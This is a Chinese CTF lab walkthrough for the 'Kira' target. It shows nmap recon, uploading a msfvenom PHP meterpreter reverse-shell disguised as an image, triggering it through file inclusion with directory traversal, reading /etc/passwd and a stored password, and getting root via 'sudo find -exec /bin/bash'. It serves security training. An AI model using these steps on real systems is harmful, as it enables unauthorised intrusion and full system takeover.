Kali与编程:Kira CTF靶机实战
靶机等级:Low
技能考点:文件上传、文件包含漏洞
漏洞描述:
当服务器开启allow_url_include选项时,就可以通过php的某些特性函数如include(),require()和include_once(),require_once(),利用url去动态包含文件,这时,如果文件名参数用户可控且没有做严格过滤,就导致任意文件读取或者任意命令执行(偷梁换柱)
信息收集
arp-scan -l //获取靶机IP地址
nmap -A 192.168.174.131 //使用nmap 对靶机做积极的扫描
打开浏览器,访问靶机开放的HTTP(80)服务:
总结:靶机IP地址(192.168.174.131)
开放的服务:HTTP(80)
访问靶机开放的HTTP服务,发现存在一个上传入口
漏洞探测
思路:发现上传入口,尝试上传一个图片木马
使用msfvenom生成图片木马
命令:
lhost地址是攻击端地址
lport端口是你攻击端监听端口
打开metasploit 监听
use exploit/multi/handler #调用这个模块
set payload
php/meterpreter/reverse_tcp #设置payload
set LHOST 192.168.174.177 #设置监听地址
set LPORT 443 #设置监听端口
exploit #利用
修改文件扩展名 上传图片木马
mv shell.php webshell.
上传成功后,发现上传的路径 uploads/webshell.jpg
在初始的页面发现还有一个按钮
拿到SHELL
接下来,尝试读取我们的图片木马
我们先读取账户文件(/etc/passwd) 试试
可是,当我们测试尝试读取文件的时候,发现读取不到这是为什么呢?
我决定采取遍历目录的方式再尝试一下,果然读取到了
接下来,读取我们的图片木马文件
返回metasploit 可以看到,我们已经拿到一个会话
拿到shell后靶机信息收集
uname -r #查看内核版本信息
uname -a #查看系统信息
cat /etc/passwd #查看账户文件
靶机系统是 Ubuntu 18.04 版本,在账户文件中发现了一个叫bassam的账户
在靶机/var/www/html/ 目录下我们发现了一个可疑的目录
进入后,发现了bassam账户的密码文件
查看这个文件 ,得到了bassam的密码:Password123!@#
切换到bassam 用户,可以看到成功切换到bassam用户
好的,接下来进行提权
提权
如何提权呢?
首先,我们看一下授权列表 命令:
sudo -l
发现find程序可以以root身份运行
那么,我们可以利用find来执行一个SHELL 命令:
sudo find . -name user.txt -exec /bin/bash \;
*********************提权成功!!!***********************
至此,靶机提权完成!